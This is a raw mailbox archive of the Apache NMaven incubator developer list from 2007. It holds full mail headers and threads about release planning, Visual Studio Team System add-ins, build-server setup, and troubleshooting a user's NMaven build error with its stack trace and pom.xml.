text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Unless there are any objections, I'm going to go ahead and start moving forward with preparing for a release. Shane On 9/6/07, Shane Isbell <[email protected]> wrote: > > I didn't get much feedback on where everyone stands on preparing for a > release. Are there any unresolved technical or community issues that we > need to address first? > > Shane > > > On 8/16/07, Shane Isbell <[email protected]> wrote: > > > > No. The deploy works for snapshots but the resolving is broken. Releases > > work for both. > > > > On 8/16/07, Jason van Zyl <[email protected]> wrote: > > > > > > > > > On 17 Aug 07, at 3:23 AM 17 Aug 07, Shane Isbell wrote: > > > > > > > I just want to run by what people would think about preparing for > > > > an NMaven > > > > release. Its been just over 8 months since entering the incubator > > > > and the > > > > code has reached a reasonable level of stability. > > > > > > > > > > Do snapshots work now? > > > > > > > Thanks, > > > > Shane > > > > > > Thanks, > > > > > > Jason > > > > > > ---------------------------------------------------------- > > > Jason van Zyl > > > Founder and PMC Chair, Apache Maven > > > [email protected] > > > ---------------------------------------------------------- > > > > > > > > > > > > > > > ------=_Part_165_8573696.1192679705592-- From [email protected] Thu Oct 18 22:09:09 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8849 invoked from network); 18 Oct 2007 22:09:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Oct 2007 22:09:09 -0000 Received: (qmail 22930 invoked by uid 500); 18 Oct 2007 22:08:57 -0000 Delivered-To: [email protected] Received: (qmail 22912 invoked by uid 500); 18 Oct 2007 22:08:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22903 invoked by uid 99); 18 Oct 2007 22:08:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Oct 2007 15:08:57 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Oct 2007 22:09:00 +0000 Received: by rv-out-0910.google.com with SMTP id k20so328475rvb for <[email protected]>; Thu, 18 Oct 2007 15:08:38 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=wJQlUQf1zUL+SVhpJne+sCUkf0MAdb4K6dlCwIALM+U=; b=sxokqP7i58hCbBaGRM4AoeMIDGhBl+QkN3FnGcN/2nfT2ml2iuD6LLy/6rd1mybLHDOmotsxGmzjE2IJgRixKnUczOaK4DGgL0Cv5vIRf6z+Ds5e2yl/zrxZiy9fsAC5Ewt/5aBJK+OZpMFDanDEBKMmVmPf1KjqKwxhgnSjeYc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=Anw22Lft4nOQxx73yI+Ru1vfVCqhMszEF9nttNVFO8v03MVmwocdvlNfVCSpAzzc+zMPkAc73V0KNeZ8EpgYvkQZ7nReTKWtjSD+Ysep6mJAYifY93ffEw0uu3jBJkoH1VhCRSuMeKCMQXHmjR+gZUpvIE0qhT4eTwY2UTPsUz8= Received: by 161.129.204.104 with SMTP id y19mr613124rvi.1192745318758; Thu, 18 Oct 2007 15:08:38 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 18 Oct 2007 15:08:38 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 18 Oct 2007 15:08:38 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Team System Support MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_2173_21203196.1192745318730" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_2173_21203196.1192745318730 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline It looks as though Microsoft's Visual Studio Team System donations to the ASF are finally starting to come through (I should have mine in about 2 weeks). This means I'll start working on NMaven plugins/addins for Team System. I wanted to see how many people are using or planning on using TS Unit Tests and/or Visual Studio 2008. Also are there any other things we should be looking at supporting? Thanks, Shane ------=_Part_2173_21203196.1192745318730-- From [email protected] Thu Oct 18 22:36:49 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15541 invoked from network); 18 Oct 2007 22:36:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Oct 2007 22:36:49 -0000 Received: (qmail 50506 invoked by uid 500); 18 Oct 2007 22:36:37 -0000 Delivered-To: [email protected] Received: (qmail 50492 invoked by uid 500); 18 Oct 2007 22:36:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50482 invoked by uid 99); 18 Oct 2007 22:36:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Oct 2007 15:36:37 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Oct 2007 22:36:41 +0000 Received: by rv-out-0910.google.com with SMTP id k20so334670rvb for <[email protected]>; Thu, 18 Oct 2007 15:36:20 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=opI5T4p3aw+X4TlKV6oXxNhRUpRe2En0IQjJ5VEo+zQ=; b=G1OJndyjqXP6/X1e4JLtsjzmcjPdt2kzfZ1TeMIEeADybPH2QSSEJ/2YZOdZjTDActvrdalUc412UPTz1rQU+uwF3sut6yk2VXve92ntkYOgE4OfG4pXCpcnwlG+M+ydZxIWNgoxiWanqA8l8OdtAwOJxWlIiN4QhrDhqjJM6Jk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=il+m+JH1z3wyYF/TwUYNgG/tRvpx3J0tx6/cBM+ym+4TX5dRsI/jUtfH1YlPOXlz1Pvol6Enjh5JpeeZgnfydM8xXu05bpAVp9JAdcoYqRxPaG6e/Fx3ENXotgMDfSRvZDfTDYzoaMUln1TjVEJYt9ON8XvA25UrheLVda773ms= Received: by 161.129.204.104 with SMTP id w20mr636163rvh.1192746980495; Thu, 18 Oct 2007 15:36:20 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 18 Oct 2007 15:36:20 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 18 Oct 2007 15:36:20 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Setting up NMaven in Continuum MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_2238_9369049.1192746980487" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_2238_9369049.1192746980487 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi Brett, I'd like to setup NMaven in continuum. It looks as though the continuum instance is running Solaris 10, which is okay, but I need to get the latest version of Mono and jdk 1.5 installed on the build machine. How do we get this started? Thanks, Shane ------=_Part_2238_9369049.1192746980487-- From [email protected] Thu Oct 18 23:23:17 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25737 invoked from network); 18 Oct 2007 23:23:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Oct 2007 23:23:17 -0000 Received: (qmail 79565 invoked by uid 500); 18 Oct 2007 23:23:05 -0000 Delivered-To: [email protected] Received: (qmail 79546 invoked by uid 500); 18 Oct 2007 23:23:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79537 invoked by uid 99); 18 Oct 2007 23:23:05 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Oct 2007 16:23:05 -0700 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mx06.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Oct 2007 23:23:06 +0000 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAP+GF0fKQ1bn/2dsb2JhbAAM X-IronPort-AV: E=Sophos;i="4.21,297,1188741600"; d="scan'208";a="72829387" Received: from unknown (HELO [161.129.204.104]) ([161.129.204.104]) by smtp06.syd.iprimus.net.au with ESMTP; 19 Oct 2007 09:22:42 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: Setting up NMaven in Continuum Date: Fri, 19 Oct 2007 09:22:40 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org I'll create you an account and ping you offline. On 19/10/2007, at 8:36 AM, Shane Isbell wrote: > Hi Brett, > > I'd like to setup NMaven in continuum. It looks as though the > continuum > instance is running Solaris 10, which is okay, but I need to get > the latest > version of Mono and jdk 1.5 installed on the build machine. How do > we get > this started? > > Thanks, > Shane -- Brett Porter - [email protected] Blog: http://www.devzuz.org/blogs/bporter/ From [email protected] Fri Oct 19 17:15:59 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39970 invoked from network); 19 Oct 2007 17:15:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Oct 2007 17:15:59 -0000 Received: (qmail 59874 invoked by uid 500); 19 Oct 2007 17:15:47 -0000 Delivered-To: [email protected] Received: (qmail 59828 invoked by uid 500); 19 Oct 2007 17:15:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59819 invoked by uid 99); 19 Oct 2007 17:15:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Oct 2007 10:15:46 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO hs-out-2021.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Oct 2007 17:15:50 +0000 Received: by hs-out-2021.google.com with SMTP id h53so492794hsh for <[email protected]>; Fri, 19 Oct 2007 10:15:29 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=UuURhDnli79wbuzySBqfnmdWuiqJCjNXjso3+jZUpu8=; b=bZiDdpu3ZQ64NQXK3FscdDg5/DYXZZy7G7JrzhuFIvNwntNYWsPDTyjkWfKFDg2AkUvIZzkh2cii1xfY+vdcKQUNfCjFpIxyZvkhKJj2T2FInAEaocAiSOE9OPtxgWl/h1LyuuYI2kl/8tKFJLd4+qGdm3RUWi6zv2mYPTjwbxM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=UtZBaH7X9AH3obnqHnCi5i6xiG2fBm6nCibi94diZ6mG23QTnWR6E1MQeeHK65wJrmSh2bxmuHkt0AHsHq8lk/Je3XPx4JybLHOQG9ts+phXWlkafQfbN333eS89Dt3kfl/WZkBW9dr9zoe9IH9gG+qwTMi5yJWYpmTHA5jCPiY= Received: by 161.129.204.104 with SMTP id d8mr3278729agb.1192814129169; Fri, 19 Oct 2007 10:15:29 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 19 Oct 2007 10:15:29 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 19 Oct 2007 10:15:29 -0700 From: "Evan Worley" <[email protected]> To: [email protected] Subject: Re: Team System Support In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_15569_31556964.1192814129158" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_15569_31556964.1192814129158 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Do you know if Visual C# Express has any plugin/addin capabilities? It's a really simple free IDE for those who can't afford the other products. -Evan On 10/18/07, Shane Isbell <[email protected]> wrote: > > It looks as though Microsoft's Visual Studio Team System donations to the > ASF are finally starting to come through (I should have mine in about 2 > weeks). This means I'll start working on NMaven plugins/addins for Team > System. I wanted to see how many people are using or planning on using TS > Unit Tests and/or Visual Studio 2008. Also are there any other things we > should be looking at supporting? > > Thanks, > Shane > ------=_Part_15569_31556964.1192814129158-- From [email protected] Fri Oct 19 17:22:57 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41596 invoked from network); 19 Oct 2007 17:22:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Oct 2007 17:22:56 -0000 Received: (qmail 66888 invoked by uid 500); 19 Oct 2007 17:22:44 -0000 Delivered-To: [email protected] Received: (qmail 66867 invoked by uid 500); 19 Oct 2007 17:22:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66858 invoked by uid 99); 19 Oct 2007 17:22:44 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Oct 2007 10:22:44 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 19 Oct 2007 17:22:48 +0000 Received: by rv-out-0910.google.com with SMTP id k20so596696rvb for <[email protected]>; Fri, 19 Oct 2007 10:22:26 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=C+tfODQKgCZrisVhXUAJm9ZozJOvrGz6y2uxc13pP+0=; b=UJqGfGaKXHcOOu99t/5iMBlfTfYVO7LnvvFElOzelKfCdDkqLQ5DKEZ33RArG3GeHkxWGtYC3Nug0IC/9boR6B2RVMVnnz+txSOcsEgPSvySNcIjfj7P+ZDb7+VTNktM8pKoU8zlZlcqsRE9XEw+F0vi4KD3OUWEv+JaE32LhwI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=bFa6rlN4SHeU4jokQQAf1mqzhCN4IdgYnxTc8nPDEVFNuDEflN4Gj75ttILumvHTZQLkGkUu5oouYWW61iXFnIztaYbz8D9qNBpwJIn38AjOzOOCID0jC3I7QAOCNMCFgYtwTkg7hpqm6wXstGhTaVDMJxczTvNavogokCEkdf4= Received: by 161.129.204.104 with SMTP id y13mr1110640rvp.1192814546122; Fri, 19 Oct 2007 10:22:26 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 19 Oct 2007 10:22:26 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 19 Oct 2007 10:22:26 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: Team System Support In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4220_21750266.1192814546118" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_4220_21750266.1192814546118 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline No, we can't legally create addins to the express edition. SharpDevelop has equivalent capabilities to the visual c# express and in some regards is better than VS2005. A while back, I had an addin for NMaven SharpDevelop, although it currently doesn't function and needs a lot of work to bring up to the level of the VS2005 one, in case anyone is interested in taking that over or creating a clean implementation. Shane On 10/19/07, Evan Worley <[email protected]> wrote: > > Do you know if Visual C# Express has any plugin/addin capabilities? It's > a > really simple free IDE for those who can't afford the other products. > > -Evan > > On 10/18/07, Shane Isbell <[email protected]> wrote: > > > > It looks as though Microsoft's Visual Studio Team System donations to > the > > ASF are finally starting to come through (I should have mine in about 2 > > weeks). This means I'll start working on NMaven plugins/addins for Team > > System. I wanted to see how many people are using or planning on using > TS > > Unit Tests and/or Visual Studio 2008. Also are there any other things we > > should be looking at supporting? > > > > Thanks, > > Shane > > > ------=_Part_4220_21750266.1192814546118-- From [email protected] Sun Oct 21 14:40:16 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67250 invoked from network); 21 Oct 2007 14:40:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Oct 2007 14:40:16 -0000 Received: (qmail 12932 invoked by uid 500); 21 Oct 2007 14:40:03 -0000 Delivered-To: [email protected] Received: (qmail 12912 invoked by uid 500); 21 Oct 2007 14:40:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12903 invoked by uid 99); 21 Oct 2007 14:40:03 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 21 Oct 2007 07:40:03 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 21 Oct 2007 14:40:06 +0000 Received: by nf-out-0910.google.com with SMTP id k4so842805nfd for <[email protected]>; Sun, 21 Oct 2007 07:39:45 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=P/iKerMx36LNq+FT30/WNzntuOimnhD91lvTpBi7IO8=; b=eHH0Iof4HOnh+ke74Wg/bN2Usq+x8/Xunx1MUAUB0hfWNTWP1sZ9RvTMuwvYn4qfMdj0YpBZ3ZB7geNH/yNz6KbFJ/yLlipSI07pb6VVV3bgNl94opShRwe3cTI8YN9fXbKYX7+2A18hb0PYL1TE3YFRQBOKga/OMbzrNOQuZaQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=AOS+vSRL0HhHOyarnUyEFJpEjboNhJE7C8lMG/CHmrksHdf/xLixnfKc7wXH1qiE0fy/36jFwAE8Bjku/dwTASAZPCGXjyWGhZ+CgC9EUS+FNmroNeK9lvkFUZK09X8ytHZR/Iieqbyxq1GyfdhqzsJPUZK3bW4viGcn/eNoN5o= Received: by 161.129.204.104 with SMTP id q5mr2408958huf.1192977584355; Sun, 21 Oct 2007 07:39:44 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 21 Oct 2007 07:39:44 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 21 Oct 2007 15:39:44 +0100 From: "Marco Mistroni" <[email protected]> To: [email protected] Subject: Help with NMaven MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_218_23766694.1192977584340" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_218_23766694.1192977584340 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline hi all, not sure if this is the right mailing list but when i browse i found just this one, plus the commit one, plus the private one I am Marco, i have been using java mvn for about 3 years, now i started to do some C# coding and i found out that with NMaven i can build app in C# in same way i am using for java. i have downloaded nmaven, and built my first project, however when i compile i am getting this exception ************ EXCEPTION *************************** at org.codehaus.classworlds.Launcher.main(Launcher.java:375) [INFO] ------------------------------------------------------------------------ [ERROR] BUILD ERROR [INFO] ------------------------------------------------------------------------ [INFO] NMAVEN-180-020: Problem in resolving artifact: Assembly Artifact Id = NMa ven.Plugin.Loader, Type = exe, Local Path Check = C:\Documents and Settings\Marc o Mistroni\.m2\uac\gac_msil\NMaven.Plugin.Loader\0.14-SNAPSHOT__NMaven.Plugin\NM aven.Plugin.Loader.exe, Message = Unable to download the artifact from any repos itory [INFO] ------------------------------------------------------------------------ [DEBUG] Trace org.apache.maven.lifecycle.LifecycleExecutionException: NMAVEN-180-020: Problem in resolving artifact: Assembly Artifact Id = NMaven.Plugin.Loader, Type = exe, Local Path Check = C:\Documents and Settings\Marco Mistroni\.m2\uac\gac_msil\NMa ven.Plugin.Loader\0.14-SNAPSHOT__NMaven.Plugin\NMaven.Plugin.Loader.exe, Message = Unable to download the artifact from any repository at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoals (Defa ultLifecycleExecutor.java:564) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoalWithLi fecycle(DefaultLifecycleExecutor.java:480) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoal (Defau ltLifecycleExecutor.java:459) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoalAndHan dleFailures(DefaultLifecycleExecutor.java:311) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeTaskSegmen ts(DefaultLifecycleExecutor.java:278) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.execute (DefaultLi fecycleExecutor.java:143) at org.apache.maven.DefaultMaven.doExecute(DefaultMaven.java:334) at org.apache.maven.DefaultMaven.execute(DefaultMaven.java:125) at org.apache.maven.cli.MavenCli.main(MavenCli.java:280) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke (NativeMethodAccessorImpl. java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAcces sorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:585) at org.codehaus.classworlds.Launcher.launchEnhanced(Launcher.java :315) at org.codehaus.classworlds.Launcher.launch(Launcher.java:255) at org.codehaus.classworlds.Launcher.mainWithExitCode(Launcher.java :430) at org.codehaus.classworlds.Launcher.main(Launcher.java:375) Caused by: org.apache.maven.plugin.MojoExecutionException: NMAVEN-180-020: Probl em in resolving artifact: Assembly Artifact Id = NMaven.Plugin.Loader, Type = ex e, Local Path Check = C:\Documents and Settings\Marco Mistroni\.m2\uac\gac_msil\ NMaven.Plugin.Loader\0.14-SNAPSHOT__NMaven.Plugin\NMaven.Plugin.Loader.exe, Mess age = Unable to download the artifact from any repository at org.apache.maven.dotnet.plugin.resolver.NetDependencyResolverMojo.exe cute(NetDependencyResolverMojo.java:166) at org.apache.maven.plugin.DefaultPluginManager.executeMojo (DefaultPlugi nManager.java:443) at org.apache.maven.lifecycle.DefaultLifecycleExecutor.executeGoals (Defa ultLifecycleExecutor.java:539) ... 16 more [INFO] ------------------------------------------------------------------------ [INFO] Total time: 10 seconds [INFO] Finished at: Sun Oct 21 15:38:07 BST 2007 [INFO] Final Memory: 7M/15M [INFO] ------------------------------------------------------------------------ ********* here's my pom.xml .. generated by nmaven when i created the archetype ************** <?xml version="1.0" encoding="UTF-8"?> <project xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>MyCSharp</groupId> <artifactId>MyCSsharp</artifactId> <version>0.14-SNAPSHOT</version> <packaging>library</packaging> <build> <sourceDirectory>src/main/csharp</sourceDirectory> <testSourceDirectory>src/test/csharp</testSourceDirectory> <plugins> <plugin> <groupId>org.apache.maven.dotnet.plugins</groupId> <artifactId>maven-compile-plugin</artifactId> <extensions>true</extensions> </plugin> </plugins> </build> </project> could anyone help me out? thanks in advance and regards Marco ------=_Part_218_23766694.1192977584340-- From [email protected] Sun Oct 21 15:59:10 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 139 invoked from network); 21 Oct 2007 15:59:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Oct 2007 15:59:10 -0000 Received: (qmail 49690 invoked by uid 500); 21 Oct 2007 15:58:58 -0000 Delivered-To: [email protected] Received: (qmail 49673 invoked by uid 500); 21 Oct 2007 15:58:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <nmaven-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49664 invoked by uid 99); 21 Oct 2007 15:58:58 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 21 Oct 2007 08:58:58 -0700 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS,WHOIS_MYPRIVREG X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 21 Oct 2007 15:59:00 +0000 Received: by rv-out-0910.google.com with SMTP id k20so1018781rvb for <[email protected]>; Sun, 21 Oct 2007 08:58:38 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=A47j7uEbzI6VgDQsYVDJcSBD1rUiXXyWFLNNUoES6zk=; b=DXehGHiSPTn5sZ5jr8QHLk8Caq+TVwXpTfEvufM8TdI7i8g1X7hH0hQIRODj/3SXduxHbm3sw6G2TgZaG3pXRh26i4JD9JBo7j+KZDOgRydxKookSN7GPCr7ZDTFhxbS8TmaVkh1Ck8nZ56P/ywaLBfLwF1h1f5rRkjTqsWdkpQ= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=B8AvQeCcbyc8IrQlSIlrMWfsx4EaovwUnRHxQZo+5VZAzhmEKMqlWw6lCQH5EWB0jrpGGjZFUkjcEupDoVMVqFcO6THOE13W1Hv34kvlKV3dMfTgsh+wpaJsV5rJIowdK96ZLPIf1xBQlB3nrFSYf1yzRnKf49f5+0jlfMiZueo= Received: by 161.129.204.104 with SMTP id v3mr1888583rvd.1192982318750; Sun, 21 Oct 2007 08:58:38 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 21 Oct 2007 08:58:38 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 21 Oct 2007 08:58:38 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: Help with NMaven In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_6583_25288080.1192982318730" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_6583_25288080.1192982318730 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline The NMaven.Plugin.Loader.exe should have been built during your build of NMaven trunk (bootstrap-build.bat), but it looks as though it wasn't. Can you check the bootstrap build logs and see if anything went wrong? This may also be related to Paul Anderson's problem: http://www.nabble.com/getting-NMaven-0.14-SNAPSHOT-to-work-tf4545872.html and he found a work around. I'll look into this some more and see if I can reproduce. Shane On 10/21/07, Marco 